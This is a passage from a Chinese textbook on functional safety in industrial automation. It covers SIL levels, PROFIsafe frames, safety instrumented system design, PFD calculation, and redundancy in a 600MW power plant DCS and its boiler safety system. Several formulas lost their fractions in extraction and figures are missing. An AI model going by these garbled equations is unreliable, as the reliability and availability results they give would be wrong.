多人死亡 SIL3 10—4~10—3 几人死亡 SIL2 10—3~10—2 一人或几人的严重伤害 ,一人死亡 SIL1 10—2~10—1 严重伤害 (4) F报文结构分析 。 以上讨论了 PROFIsafe安全传输报文所使用的方法 。 下面介绍故障安全报文结构 , 即 PROFIsafe在 Profibus通信上的具体映像 。 先来观察 Profibus-DP报文结构 , DP帧结构 (过程数据) 如图5-25所示 ,全部 F报文结构如图5-26所示 。 图 5-25 DP帧结构(过程数据) 图 5-26 全部 F报文结构 在 DP帧结构中 ,Data Unit、 PB(Parity-Bit) 和 FCS是人们关注的焦点 。在系统组态/启 动阶段 ,Slave(从站) 通过 GSD(设备基本数据/设备数据库文件) 文件将有效数据的格式通 报 DP主站 。在 PROFIsafe中的情况与此雷同 。 5.3 过程工业控制安全仪表系统功能安全实现 5.3.1 安全仪表系统设计整体策略 (1) 安全仪表系统不能由标准的 DCS系统来完成 ,如果 DCS与安全仪表系统使用相同 的信号 ,则信号接口必须做到: 任何 DCS的故障都不会影响安全功能 。 (2) 逻辑解释器(由 PLC完成) 需要独立的认证 (如 TÜV认证) 并且必须至少符合 SIL3的标准 。 (3) 安全仪表的功能模块必须尽量简单 。 (4) 通常在 SIL3中不使用单通道结构 。 (5) 触发功能在过程值返回其正常值后不会自动复位 。可行的情况下使用“故障安全原则”。 (6) 尽可能地使用模拟量而不是开关量 。 (7) 尽量增加在线诊断范围 。 (8) 短路 、开路监控 。 (9) 模拟信号用 A、B通道比较 。 (10) 疑似信号的检查执行机构位置信号的读取(用于阀门)。 5.3.2 安全仪表系统自诊断策略 (1) 在所有可能的情况下用模拟量代替开关量 。 (2) 增加在线诊断的覆盖率: ①短路监测 、短路监测; ②比较 A、B通道的模拟信号; ③信号可信度检测; ④读出执行器(比如阀门) 开度信号 。 5.3.3 化工控制安全仪表系统 在化工生产系统中 , 为了规避可能发生的各种故障及危险 ,采用了分层控制的思想来确保安全生产 。第一层控制系统是大家所熟知的 DCS控制系统或者 PLC控制系统 , 它负责与 生产任务相关的任务和手段的实现 。第二层控制系统是基于 DCS系统或者安全总线系统的 监控层 ,这一层通过操作人员的介入 、人为地在潜在的危险即将发生的时候采取一系列操 作, 从而避免可能会发生的危险 。但是 , 由于操作人员并不能及时地发现所有的潜在故障, 并且及时操作人员发现了故障, 但他们无法找到故障的源头 , 因此也可能无法马上使系统进 入安全状态 。基于这种考虑 , 安全联锁系统就显得尤为重要 。 安全联锁系统是独立于 DCS 系统或者 PLC控制器的独立控制系统, 它的输入是系统的关键物理量信号 , 而输出往往是 驱动电磁阀的信号 。 电磁阀进过驱动后进一步控制执行机构 ,进行安全联锁操作 。不同安全 相关措施的作用如图5-27所示 。 图 5-27 不同安全相关措施的作用 在图5-27中 ,安全联锁系统可以指以下的系统: 冗余的传感器把现场过程变量的状态输入到输出输入模块中 ,例如反应釜内的温度 、单 体管内的流量 、单体管内的温度 、单体管内的压强大小等 。之后 ,输入输出模块把信号传导 到输入输出模块中 ,输出模块中的电信号驱动电磁阀 , 电磁阀驱动控制阀控制阀门的开度, 以达到安全联锁的目的 。安全联锁系统如图5-28所示 。 5.3.4 安全仪表系统的故障模式 安全仪表系统的故障模式主要分为主动错误和被动错误两种 。 (1) 主动错误是指明显的 、能被察觉的安全错误 。 主要有4个特点: 1) 可以被系统的自诊断发现 。 2) 可能会联锁安全联锁系统的动作 ,虽然这些故障并不会使系统陷入危险 。 3) 会降低工厂的生产能力 。 4) 不会影响工厂的安全 。 (2) 被动故障是指不明显的 、不能被察觉的危险故障 。 主要有5个特点: 1) 会导致安全联锁系统在必要的操作时发生故障 。 图 5-28 安全联锁系统示意图 2) 会危及生产的安全 。 3) 无法被自诊断发现 。 4) 只能通过安全联锁系统的功能验证测试发现 。 5) 危险的被动故障的时间平均概率由 PFD(Probability of Failure on Demand) 定义 。 5.3.5 选择合适的安全仪表回路结构 (1) 制定安全联锁系统的设备和仪表选型原则 。 1) 使用通过认证的或者是经过实际使用验证的仪表 。 2) 使用没有系统设计错误或者会导致冗余通道同时陷入共因实效的生产错误的设备 。 3) 安全联锁系统的正确设计 。冗余的传感器和执行器的通道提高了单元被动和主动故 障隔离的能力 。 4) 如果使用经认证的供应商的设备和简单标准结构/类型的设备就不需要确定仪表功能 的有效性 。 5) 批准的标准设计已经经过安全鉴定并满足安全定义(SIL2和/或 SIL3), 并且这些标准的 设计是以下各条的结合:标准的结构 、可允许的测试频率 、标准的现场设备和对维修的需要。 6) 需要定期进行安全联锁系统的功能测试 , 以便及时发现安全联锁系统的被动错误 。 (2) 仪表系统结构选择 。 由于现场仪表的 PFD计算往往由于原始数据的准确性欠佳而难以令人信服 , 因此在选 择仪表的系统结构时 ,更偏向于根据IEC61508和IEC61511的要求及实践经验 ,综合分析 危险矩阵所得的风险评估 。安全完整性级别和故障率的关系见表5-11。 表 5-11 安全完整性级别和故障率的关系 安全完整性等级(SIL) 故障率(PFT) 适用范围 1 0.10~0.01 操作和监控功能 2 0.01~0.001 安全仪表系统(ClassA功能) 3 0.001~0.0001 4 <0.0001 不能由仪表功能单独完成 1) SIL2结构 。SIL2结构如图5-29所示 。 .单通道设计, 可使用1选1。 .12个月测试间隔 。 图 5-29 SIL2结构示意图 2) SIL3结构 。SIL3结构如图5-30所示 。 .不允许单通道设计 。 .起码2个传感器(2选1) 和2个执行器 。 .12个月测试间隔 。 图 5-30 SIL3结构示意图 3) SIL3部分测试周期的叠加 。部分测试叠加的 SIL3结构如图5-31所示 。 .测试时间间隔如图5-32所示 。 .执行机构12个月 。 .传感器系统(带自诊断) 5年 。 5.3.6 失效可能性达到要求的安全仪表系统 (1) 基本参数及 PFD失效性的计算 。 TI: 安全联锁系统功能验证测试的时间间隔 。 取值: 需要发现危险故障的时间周期 。 MTBF: 一个设备的平均故障间隔 。 图 5-31 部分测试叠加的 SIL3结构示意图 取值: 根据设备供应商提供的数据或者现场测试得出的数据 。 故障率λ=1/MTBF 取值: 通过 MTBF的倒数计算获得 。 Pf(t): 某项功能的故障率 , 比如说当故障率λ已知时 ,Pf(t)=1—e — λt 。 取值: 通过代入λ的值计算获得 。 PFD: 失效可能性 PFD =1/TI∫0(T)IPf(t)dt。 取值: 通过在定义式子中代入 TI和Pf(t) 得到 。 PFD计算的一般方法可以归纳如下: 根据测试时间间隔 TI和错误率(由供应商提供) 计算 。公式为 Pf(t)=1 — e—λt 对于更加复杂的系统(2oo3系统等) 可以用简单的数值模型 。 现场的 PFD和控制室的PFD 可以相互算数叠加 , 即 PFDsis =PFDsenor +PFDplc +PFDactuator (2) PFD的曲线 。 PFDAVG 与 Pf(t) 和 TI的关系曲线如图5-32所示 。 图 5-32 PFDAVG 与 Pf(t) 和 TI的关系曲线 由图5-32可知, PFD依赖于设备的故障概率和测试间隔的大小 。 (3) 降低 PDFAVG 。 总体说来, 一共有三个根本的方法降低 SIS失效的可能性: 方法一 ,安装两倍 、三倍或四倍的设备; 方法二 ,扩大设备诊断范围; 方法三 ,提高设备被测试的频率 。 安装两倍 、三倍或四倍的设备可以降低 PDFAVG ,但是成本比较高 , 而且增加了管理的 难度, 对其他设备的要求也有所提高 。 扩展诊断范围是比较容易且性价比较高的 , 因为大量的设备提供嵌入式诊断功能 ,并且 是与资产管理软件相结合的 。但是 , 当引入这样的解决方案作为安全仪表系统的一部分时, 需要特别谨慎 。 根据资料 ,Exida的安全系统专家检查了采用 HART通信协议的多路复用器, 例如来 自 P+F的, 与 Emerson Process Management 的资产管理解决方案(AMS) 软件协同工作, 来扩大安全仪表系统设备诊断覆盖范围的可用性 。 Exida报告指出被测试的设计方案在扩展设备诊断范围中能够发挥功效, 并能符合IEC 61511的许多要求 。AMS软件为口令与权限提供恰当的安全措施, 确定并记录流程 , 以保 证正确的使用 HART手持通信器 。 当下, 最理想的方式是使用较高频率的充分证明(full-proof) 测试来降低 PFDAVG 。如 图5-33所示, 进行全程测试时 , 当测试的时间间隔从 1年降低到每年 3次时, PFDAVG 有 明显的降低 。 图 5-33 测试周期长短与 PFDAVG 的关系 在实际操作时 ,有两种选择: 1) 使用相同设备以符合更高的安全级别(SIL)。 2) 使用较便宜的设备以达到相同的 SIL。 (4) 在满足所要求的 PFDAVG 的情况下 ,延长测试周期 。 定期使用手动的或自动的局部测试, 可以有效地延长完整的测试间隔 。 如图 5-34所 示 ,原本的完整测试间隔为1年 。也就是说, 一年进行一次完整的验证测试 。 当采用阀门的 局部测试时 , 即当1年分5次进行局部行程阀测试时, 可以把进行一次完整测试的时间间隔 提高到2.5年左右 。 更加值得注意的是 ,充分证明测试通常要求关闭流程或安装旁路线 。越多的过程设备在 有计划关机之间运行时间越长 ,就没有进行充分证明测试的机会; 与之相反 ,进行局部的测 试具有更大的可能性 ,并且可以把测试对生产的影响降到最低 。 图 5-34 局部测试可延长测试周期 5.3.7 安全仪表系统结构确定 由对象风险降低技术的确定可知 , 如果需要选择 SIL2或者 SIL3级的安全设备 , 可由 图5-29SIL2结构示意图和图5-30SIL3结构示意图分别确定相应安全仪表回路的结构和 测试周期 。 逻辑控制器结构的确定如图5-35所示 。 图 5-35 逻辑控制器结构与生产安全与工厂效率的关系 为了构成一个安全系统 ,需要选择中级或者以上的安全可靠性 。 2oo3结构可以保证中 等偏上级别的工厂安全率 、并且有较高的生产效率 , 为十分合理的选择 。 同时 , 1oo2结构 能够保证更高的工厂安全水平 ,虽然在次结构下的生产效率低于 2oo3结构 , 然而考虑到它 只需要设计两个通道 , 减轻了设备的设计难度和设备费用 , 还是值得考虑的 。从表面上来 看 ,2oo4的安全可靠性和生产效率的组合是最佳的 。然而其设备成本和维护成本比起单冗 余 、双冗余的系统都有大幅增加 ,不经济 。 综上所述 , 1oo2机构和2oo3结构都是满足系统控制要求的结构 。 5.3.8 安全仪表系统标识 安全仪表系统和他们的组件(变送器 、 电源 、输出输入卡和逻辑控制器) 应清楚地在文 件里和现场用 Z标明 。现场用“ Z”标示安全系统如图5-36所示 。 图纸中用“ Z”标示安全 系统如图5-37所示 。 5.3.9 安全仪表系统作用与结构 安全信号的控制功能的实现可以采用普通继电器 、普通 PLC 、标准现场总线或 DCS等 逻辑控制元器件 。但是应该注意到 ,普通继电器 、普通 PLC 、标准现场总线或 DCS不属于 安全相关元器件或系统 , 它们在进行安全相关控制的时候可能会出现以下安全隐患: 处理器 不规则 、输入/输出卡件硬件故障 、输入回路故障(比如短路 、触点融焊)、 输出元器件故障 (如触点融焊)、 输出回路故障(如短路 、 断路)、 通信错误等 。 这些安全隐患 , 都会使安全功能失效 ,从而导致事故的发生 。所以 ,安全控制系统就是要求能够可靠的控制安全输入信 号 ,一旦当安全输入信号变化或安全控制系统出现任何故障 , 立即作出反应并输出正确信 号 ,使机器安全停车 , 以阻止危险的发生或事故的扩大 。安全控制系统的硬件主要采取了以 下措施来达到安全要求: 1) 采用冗余性控制 。 2) 采用多样性控制 。 3) 频繁 、可靠的自检 。 4) 程序 CRC校验 。 5) 安全认证功能块 。 图5-38给出一个安全仪表系统的结构示意图 。 图 5-38 安全仪表系统示意图 PLC自动化安全系统应用实例 6.1 PLC自动化在工业过程控制中的应用 6.1.1 电厂600MW 机组 DCS安全系统 6.1.1.1 电厂生产过程描述 电厂规划容量6×600MW机组 ,工程分二期建设 ,一期工程建设规模为 4×600MW ,连 续建设 ,二期工程建设规模为2×600MW 。3号 、4号锅炉为上海锅炉厂有限公司设计生产的 SG-2028/17.5-M904型亚临界控制循环 、一次中间再热 、单炉膛 、 四角切圆燃烧方式 、燃烧器 摆动调温 、平衡通风 、 固态排渣 、全钢悬吊结构 、Ⅱ型露天布置燃煤锅炉 。过热器采用二级喷 水减温方式 ;再热器利用调节摆动燃烧器喷嘴倾角调节再热汽温度 , 同时设事故喷水装置 。燃 烧系统布置为3层点火枪(12只)、 3层重油燃烧器(12只)、 6层煤燃烧器(24只)。 汽机为东方汽轮机厂设计生产的 N600-16.7/538/538-1型亚临界 、一次中间再热 、单 轴 、三缸四排汽 、凝汽式汽轮机 ,采用定一滑一定复合运行方式 , 承担基本负荷 ,并具有调 峰能力 , 布置方式为室内纵向顺列布置 ,启动方式为中压缸起动并带有高中压缸联合启动方 式 , 汽机旁路系统采用高 、低压串联旁路 ,其容量按锅炉最大连续蒸发量的35%设置 。 主蒸汽及再热蒸汽均为单元制系统 。采用 2-1-2布置方式 , 可减少由锅炉两侧引出的蒸 汽在汽轮机进口的温度偏差 ,有利于汽轮机的安全运行 。 主蒸汽作为汽动给水泵在机组低负荷时的备用汽源 。冷再热蒸汽作为辅助蒸汽系统的汽 源之一 。给水系统采用单元制 。每台机组设置两台 50%容量汽动给水泵及一台容量为 30% 的电动调速给水泵作启动备用泵 。三台高压加热器采用大旁路系统 , 给水操作台旁路容量为 30BMCR。给水系统还为再热器减温器 、过热器减温器及旁路系统提供减温水 。 给水泵汽轮 机布置于汽机房运转层 ,排汽进入主汽轮机凝汽器 。 凝结水系统采用中压凝结水精处理系统 , 每台机设 2×100凝结水泵 , 一台运行一台备 份 。从凝汽器出来的凝结水分别经过凝结水泵 、凝结水精处理装置 、轴封冷却器和4台低压 加热器进入除氧器 。设有凝结水储存水箱和输送泵 , 为凝结水系统提供补水和启动注水 , 同 时也作为凝汽器热井水位控制的补水和储水 。 汽轮机采用八级非调节抽汽 。1、2、3级抽汽分别供给三台高压加热器, 4级抽汽供给 除氧器 , 5、6、7、8级抽汽分别供给四台低压加热器 。4级抽汽亦作为给水泵汽轮机正常运 行汽源 。7、8号低加为共用一个壳体的复式加热器 , 卧式布置在凝汽器喉部 。 各高压加热器疏水采用逐级自流的方式最终进入除氧器 ,在事故情况或低负荷时 , 疏水 可直接进入凝汽器中 。 同样 ,低压加热器疏水也采用逐级自流的方式 , 最终进入凝汽器中,同时也设有事故疏水措施 , 以保护低压加热器 。 辅机冷却水系统由开式循环冷却水系统和闭式循环冷却水系统组成 。 闭式循环冷却水系 统主要用于冷却转动机械轴承 、 电动机等对水质有所要求的地方 , 而开式循环冷却水系统取 自循环水系统 。锅炉有关设备及辅机冷却水采用闭式循环冷却水系统 ,冷却水全部回收 。 针对机组以上工艺要求 , 3号 、4号机组 DCS系统覆盖了全厂 ,包括锅炉 、汽机的数据 采集系统(DAS)、 模拟量控制系统 (MCS)、 顺序控制系统 (SCS)、 锅炉炉膛安全监控系 统(FSSS)、 汽机旁路控制系统(BPC)、 电气控制系统(ECS) 等功能 。 同时还与电厂的其 他系统进行通信和数据交换 ,这样的子系统如汽机数字电液控制系统 (DEH)、 给水泵汽机 数字电液控制系统(MEH)、 锅炉吹灰控制系统 、炉管泄漏系统 、锅炉IDAS、汽机IDAS、 烟气监测系统 、380V电气监控系统 、6kV电气监控系统等 ,用来达到在 DCS系统上监控全 厂运行的目的 。 6.1.1.2 电厂现场可利用率 现场对 DCS系统可靠性试验主要是可利用率试验(SAT)。 可利用率表明了一个可恢复 特性的装置或系统能在规定的时间内完成其规定功能的概率 。通过可利用率试验 ,验证机组 DCS连续可靠运行能力 。600MW 机组 DCS合同规定 DCS系统应保证99.9%的可利用率 。 系统可用率可按下列公式计算 A = ×100% (6 - 1) tf = Kfit fi (6 - 2) 式中 tt ——— 实际试验时间 , 它是指整个连续考核统计时间和扣除由于非系统因素造成的空 等时间 。 tf ——— 故障时间 , 它是指被考核系统中任一装置或子系统在时间试验时间内因故障而 停用的时间经加权后的总和 。 tfi ——— 第i个装置或子系统故障停用时间 。 Kfi ——— 第i个装置或子系统的故障加权系数 ,DCS系统加权系数参见表6-1。 表 6-1 DCS 系 统 加 权 系 数 装 置 加权系数 装 置 加权系数 操作员站 n/N 每台打印机 0.1 工程师站 0.3 每台硬盘 、光驱 0.2 显示 0.2 每台软驱 0.2 报警 0.2 历史数据和检索 0.1 报表 0.1 SOE 0.2 计算 0.1 服务器 1.5n/N 每台 LCD 0.1 控制器模件 n/N 每台键盘 0.1 其他模件 n/N 电源 n/N 其他控制系统通信 0.1 每只鼠标 0.05 每条数据公路 1 注 1. N 为总数 ,n为故障数 。 2.当鼠标作主要操作手段时 ,加权系数同键盘 。 实际试验时间和故障时间根据运行班志(依据计算机记录) 确定 。也可以按下面简单办 法测试: DCS在连续运行90天(2160小时) 后 ,其故障时间小于2.2小时 ,则可认为成功 地完成了可利用率试验 。若故障时间超过了2.2小时 ,可利用率试验应延长至180天 , 在此 期间 ,故障时间不应超过4.3小时 。但是完成可利用率试验的总时间应限制在270个连续日 内 ,其间的故障时间不应超过 6.5小时 。如果试验的结果连续三次超过规定的故障时间限 制 ,则认为试验未通过 。 在168小时考核其间 ,如发生由于 DCS原因引起的机组与电网解列 、操作员站功能同 时丧失 、DCS通信故障 、任何冗余模件同时故障或由 DCS引起的主要保护功能丧失 , 则 168小时的 DCS可用率考核未通过 。 6.1.1.3 功能安全在600MW 机组 DCS中的应用 通常 ,对控制系统的安全完整性水平的要求是 SIL3, 也就是说 , 控制系统有效性应该 达到99.9% 。然而 ,很少有单个设备的安全完整性水平能达到 SIL3, 一般都为 SIL1或者 SIL2的等级 。但是通过适当的冗余结构 ,可用多余的资源来换取系统可靠性的提高 。 (1) 硬件冗余技术 。 为了提高系统的可靠性 ,分散控制系统在重要设备 、对全系统有影响的公共设备上必须 采用冗余结构 。所有设备都采用冗余结构显然是不经济和不必要的 。招南电厂 DCS系统中 采用了如下的冗余方式 。 1) 工作冗余 。工作冗余即热备用 ,就是若干同样装置同时并联工作 ,执行相同的任务, 只有当所有装置全部失效时系统才失败 。 热备用的可靠度按照并联系统公式为 Rp =1 —(1 — R1)(1 — R2)(1 — R3)…(1 — Rn ) (6 - 3) 并联系统的可靠度时间函数式为 Rp(t)=e—λ1t +eλ2t — e—(λ1+λ2)t 通过对系统可靠度 Rp(t)由0~∞积分 ,求得该并联系统的平均故障间隔时间为 MTBF = ∫ 0(∞)Rx(t)dt = + — (6 - 4) 现λ1 =λ2 =λ,MTBF = 。 由此可见 , 两 个 装 置 组 成 的 并 联 系 统 与 单 装 置 相 比 , 平 均 故 障 间 隔 时 间 是 原 来 的 1.5倍 。 电厂 DCS在系统级 , 即网络级 , 采用这种热备用 。在整个系统中 ,冗余容错工业以太 网 A/B网同时工作 ,并没有主控副控区分 , 两个网络运行相同的程序和数据 。 当一个网络 故障时 , 只要另一个网络没有故障 , 系统照样工作 ,不存在切换 。 同时需要工作冗余的设备 还有工业以太网交换机 、交换机直流电源 、DPU网片 、MMI站网片等 。冗余环网的工作原 理如图6-1所示 。 在 MMI站中 , 也使用热备用方式 。 电厂 DCS系统中 , 5台 OPU站同时工作 , 并且 都配置成全能操作员站 , 不仅对锅炉 、 汽机同时有操作权 , 还可以对 ECS、公用系统等 进行操作 。 这样 , 即使一台或者几台操作员站故障 , 系统还可以通过剩余的操作员站进 行操作 。 2) 后备冗余 。 指仅 在 主 设 备 故 障时才 投 入 工 作 , 一 般 采 用 一 用 一 备 ,也可以多用一备 。 当一台设备运 行 ,另一台设备作为后备的系统称为 双工系统 , 或 1∶1备用系统 。 假定 备用装置不工作时失效率为零 , 从理 论上说 ,后备冗余的系统连续工作时 间可无限长 。 在 1∶1备用系统中 , 若各装置 的可靠度为Rh(t)= e—λt(1+λt) 单台装置的有效度为 A = n台装置有一台后备的有效度 ,可用马尔可夫过程状态转移矩阵求得 A = 2 μ2 +nμ+μ (6 - 5) (6 - 6) (6 - 7) DCS项目中 ,XDPS系统较多地采用了1∶1后备冗余方式来实现冗余结构: .1∶1冗余的 DPU ,采用 PDEX344卡进行跟踪与切换 , 平时一个主控 MASTER, 一 个副控 SLAVE。 .DPU中 ,I/O通信卡采用1∶1冗余结构 。 . I/O站中 ,站控制卡 BC-Net片采用1∶1冗余的结构 。 3) 表决系统 。表决系统由若干个工作单元和一个表决器组成 , 每个工作单元的信息输 入表决器 , 只有当有效的单元数超过失效的单元数时 ,才能作出输入为正确的判断 。通常使 用的表决方式为3取2, 即3个工作单中2个有效时 , 系统才执行动作 。 当各子系统失效率 都为入时 ,其可靠度为 R3,2(t)=(0(3))e— 3λt +(1(3))(1— e—λt )e0.2λt =3e— 2λt — 2e— 3λt (6 - 8) 电厂 DCS系统重要的控制回路中 , I/O卡件和通道的配置都作了 3取 2表决或 2取 2表决 。 锅炉炉膛安全监控系统(FSSS) 以下控制回路 ,采用了3取2表决系统: .汽包水位高 Ⅲ/低 Ⅲ 。 .炉膛压力高 Ⅲ/低 Ⅲ 。 .总风量<30% 。 .火检冷却风压低 。 . 一次风母管与炉膛差压低 Ⅲ 。 .汽机跳闸信号 。 .手动 MFT按钮信号 。 汽包水位 MFT3取2逻辑 ,如图6-2所示 。 图 6-2 汽包水位 MFT3取 2逻辑 另外 ,MCS模拟量调节回路中, 也使用了3取2表决系统: .炉膛压力(引风控制回路)。 .汽包压力(水位测量回路)。 .主汽压力(主汽压力设定回路)。 .功率信号(汽机主控系统)。 4) 同步运转方式 。对于可靠性要求极高的应用场合 , 采用两个或两个以上的设备以相 同的方式同步运行 ,输入相同信号 ,进行相同处理, 然后对输出进行比较裁决 。如果输出保 持一致 ,则系统是正常进行的 。两台以同步运转方式运转的系统称为双重系统 。 当然 , 双重 系统的成本是非常高的 , 同步运转方式可以看作表决系统的特例 。 5) 后退运行冗余方式 。后退运行冗余方式可以归结为工作冗余的一个特例 。 正常工况 下 ,N 台设备各自按各自的功能运行 。 一旦某台设备发生故障时 , 其余设备放弃部分不重 要的功能 , 以此来完成故障设备的功能 。 电厂 DCS 系 统 MMI站 采 用 同 一 型 号 的 工 业 控 制 计 算 机, 运 行 相 同 控 制 平 台 Netwin. exe, 赋予不同的权限, 激活不同的程序 , 即可形成不同功能的 MMI站 , 如 ENG、 HSU、OPU等 。 系统配备了 1台 ENG站和 1台 HSU 站 。 如果 ENG站发生故障, 则在 HSU站上运行组态程序, 完成 ENG的功能 。 如果 ENG和 HSU都不能运行 , 可以在某台 OPU上运行组态程序和历史收集程序, 实现 ENG和 HSU的功能 。这样 , 实现了后退运行 冗余方式 。任何个别的 MMI发生故障, 都不会影响到整个系统的功能 。 6) 多级操作IL冗余方式 。XDPS系统纵向有 MMI监控级 、DPU控制级 、I/O卡件逻 辑控制级等多层控制系统 。 即使所有的 MMI都失败 , DPU仍然能够自动控制现场的回路; 即使失去 A网和 B网等实时控制网 , DPU仍能控制系统内的回路; 即使 DPU都失去 , 重 要回路所在的I/O卡件仍然能通过缺省位置 , 使系统安全停机 。 据权威资料 , 多级控制系 统的有效度可达99.999903% , 而单级系统的最高有效度则为99.99643% 。 7) I/O测点和卡件的分配技巧 。在分配I/O测点的时候 ,特别注意以下几点: .DCS系统各子系统I/O测点 , 按生产工艺流程分为各工艺系统 。 同一工艺系统的设 备的I/O点 , 应集中在同一 DPU 中 。 各工艺系统按炉侧 、 机侧相对集中 , 平均分配到 各 DPU。 .同一工艺系统中 , 互为备用的设备 (调节回路), 或是分 A、B侧的设备 (调节回 路), 其I/O点应分散在不同的卡件 、 片箱上 。 如在锅炉风烟系统中 , 按 A、B两侧 , 分别 分配到 DPU61/81和 DPU62/82中 , 使锅炉中最重要的风烟系统风险分散 。在其他互为备 用的 A、B设备中 ,如炉水循环泵 ,则分配在不同的I/O站中 ,是为了使联锁切换更加快捷 可靠 。 . BMS的油层 、煤层测点 ,按层集中布置; 如系统中有一对以上 DPU , 油层 、煤层应 以层为单位分散布置在各 DPU。 .ECS系统中 ,各6kV、380V 一段和二段的信号 , 布置在不同的卡件 。工作段和备用 段的信号 , 布置在不同的卡件 。 这些措施 ,都是为了分散风险 , 同时同一工艺系统又相对集中布置 ,方便维护 。 8)冗余系统的选择 。 系统硬件可靠度设计一般采用以下方法: .根据系统元器件的失效率 ,计算系统的可靠度 , 同时考虑经济性 、可维护性 、操作性 等 , 以确定最佳方案 。 .在元器件可靠度不符合要求时 ,进行降额使用 , 即让元器件工作在规定的环境条件及 负载条件1/2或以下的数值 , 以降低使用要求来换取可靠性的提高 。 .当单个元器件达不到要求的可靠度时 ,应考虑采用冗余结构 。 设每个单元的可靠度均为 e — λt ,备用单元在不工作时 , 可靠度为 1。则单个设备的可靠 度 R=e — λt ,两并联设备的可靠度 R=2e— λt —e —2λt , 1∶1后备冗余的可靠度 R=e — λt(1+λt), 3取2表决系统的可靠度 R=3e—2λt —2e—3λt 。 由此可见 , 备用系统可靠度 >并联系统可靠 度 >单个设备可靠度 。3取2表决系统在 t<1.44/λ时 , 可靠度比单个设备高 , 一旦超过此 值 ,可靠度下降 。 随着时间推移 ,可靠度呈下降趋势 。说明冗余系统在相对短时期内工作, 能显著提高系统的可靠度 。 (2) 软件冗余技术 。 除了以上硬件及应用界面的冗余 , XDPS系统还采用软件冗余技术 , 包括信息冗余技 术 、时间冗余技术 。 1) 信息冗余技术 。信息冗余技术是利用增加的多余信息位提供检错甚至纠错的能力 。 .奇偶校验码 。奇校验或者偶校验是n位信息和 1位校验码中含“ 1” 的个数保持奇数 或者偶数 。如果不一致 ,则数据包传送出错 。但奇校验或者偶校验只能单独检验奇数或者偶 数个码错误 。为了提高奇偶校验码的差错检测能力 , 可以对一个信息组进行奇偶校验编码, 将这组代码看作是一个二维代码模式 ,分别沿横向与纵向进行奇偶检验编码 。这种二维奇偶校验码同时具有水平奇偶校验能力和垂直奇偶校验能力 。 .循环码 。循环码是把n位信息的代码多项式F(x)乘以 Xm (m 为冗余位的数目) 除 以某个 m次生成多项式G(x)(模2除法), 得到的余数 R(x)另外加在 F(x)上, 作冗余位 一起发送 。接受方收到循环码, 用已知的 G(x)去除, 若不能整除 , 即表示出错 。 2) 时间冗余技术 。 时间冗余技术是消耗时间资源达到容错目的 , 主要手段是重复执行 程序 。 .指令复执方法 。 当程序出错后, 让当前指令重复执行 。若非永久故障, 则程序会再第 二次顺利执行下去 。如果反复执行了预定的次数或者预定时间还没成功 ,则复执失败 。 .程序卷回方法 。程序卷回是指令复执的扩展 , 它重复的是一段程序 。如果反复执行了 预定的次数或者预定时间还没成功 ,则卷回失败 。 .冗余传送方法 。冗余传送针对数据包通信 。有三种方式: ①发送端发出信息后, 如果 收不到接收端发回的信息, 则说明传输有错, 须重发; ②发送端对同一信息发送两次, 接收 端进行比较, 如有不一致即有错, 但此方法效率稍低; ③接收端根据收到的信息编制成校验 信息, 再返回到发送端, 与发送端保存的校验信息进行比较, 如发现有错 ,则加上标记再发 一次 。 冗余传送适合数据量小, 但安全性 、可靠性要求特别高的部分 。 以上这些软件冗余技术 ,在 XPDS系统软件中普遍应用 。 (3) 自诊断技术 。 要缩短系统的平均故障修复时间 ,延长平均故障间隔时间 ,一个有效的措施就是采用自 诊断技术 。特别是在线诊断技术 ,可以使错误立即在显示器上报告用户 , 以便自动处理, 或 者人工及时进行处理 。 XDPS拥有至通道级的自检能力 。 当任意电源 、 网络 、DPU卡件, 甚至通道出现故障, 凭借硬件回路或者软件运算, 都能及时判断出, 并进行自动报警 、 自动切换等动作, 将故障 的影响消除至最低 ,然后提醒用户 ,及时进行人工在线处理 。 除了硬件 、软件判断错误外 ,还有对内存 、外部存储设备等错误进行判断的方法 。 自诊 断技术的提高, 是现代 DCS可靠性提高的有效方法 。 6.1.1.4 功能安全 FSSS应用实例 FSSS(锅炉炉膛安全监控系统), 也可称作燃烧器管理系统 (Burner Management Sys- tem), 简称 BMS。炉膛安全监控系统是现代大型火电机组锅炉必须具备的一种监控系统, 它能在锅炉正常工作和起停等各种运行方式下 , 连续密切监视燃烧系统的大量参数与状态, 不断地进行逻辑判断和运算 ,必要时发出动作指令 ,通过各种连锁装置, 使燃烧设备中的有 关部件严格按照既定的合理程序 ,完成必要的操作或处理未遂性事故 , 以保证锅炉燃烧系统 的安全 。实际上它是把燃烧系统的安全运行规程用一个逻辑控制系统来实现 。采用 BMS系 统不仅能自动完成各种操作和保护动作 ,还能避免运行人员在手动操作时的误动作 ,并能及 时执行手操来不及的快动作 ,如紧急切断和跳闸等 。事实上 ,这样的一个逻辑控制系统的设 计, 是必须在安全规范的指导下完成的 。下面从应用的角度 , 对电厂 FSSS系统进行剖析, 理解安全功能在实际系统中的应用 。 (1) FSSS构成及运行 。 FSSS系统一般分为两个部分, 即燃料安全系统 FSS(Fuel Safety System) 和燃烧器控制系统 BCS(Burner Control System)。 燃料安全系统的功能是在锅炉点火前和跳闸停炉后 对炉膛进行吹扫 , 防止可燃物在炉膛堆积 。在检测到危及设备 、人身安全的运行工况时 ,启 动主燃料跳闸(MFT), 迅速切断燃料 , 紧急停炉 。燃烧器控制系统的功能是对锅炉燃烧系 统设备进行监视和控制 ,保证点火器 ,油枪和磨煤机组系统的安全启动 、停止和运行 。 电厂 3号 、4号机组锅炉采用上海锅炉厂引进美国 CE公司技术制造的亚临界 、一次再热 、强制 循环 、 四角切圆燃烧 、 自然循环汽包炉 。燃烧系统布置为 3层点火枪 (12只)、 3层油燃烧 器(12只)、 6层煤燃烧器(24只)。 配有 6台中速磨煤机 , 每台磨煤机配一台给煤机 。火 焰检测采用单燃烧器检测 。 1)燃料安全系统 FSS。FSS通过下列监视和保护功能完成保护动作: 监视锅炉和汽轮发电机组的运行工况 ,并在检测到危害人员和设备安全的工况时 , 发出 主燃料跳闸(MFT) 信号 。 当发现危险工况时 ,应停运一部分已投运的锅炉燃烧设备和有关辅机 , 以快速切除进入 锅炉的燃料量 。 MFT发生后 ,应维持锅炉进风量 , 以便清除炉膛内 、烟道尾部和烟道中的可燃气体 。 在吹扫完成及有关许可条件满足之前 ,应阻止燃料重新进入炉膛 。 FSS主要包括炉膛吹扫 、主燃料跳闸 MFT、燃油泄漏试验及其他相关程序 。 .炉膛吹扫 。FSSS的逻辑控制中的一个核心问题是通过周密的安全连锁和许可条件, 防止可燃性混和物在炉膛煤粉管道和燃烧器中积存 , 以防止炉膛爆炸产生 。 因此 ,炉膛吹扫 是安全运行的必要措施 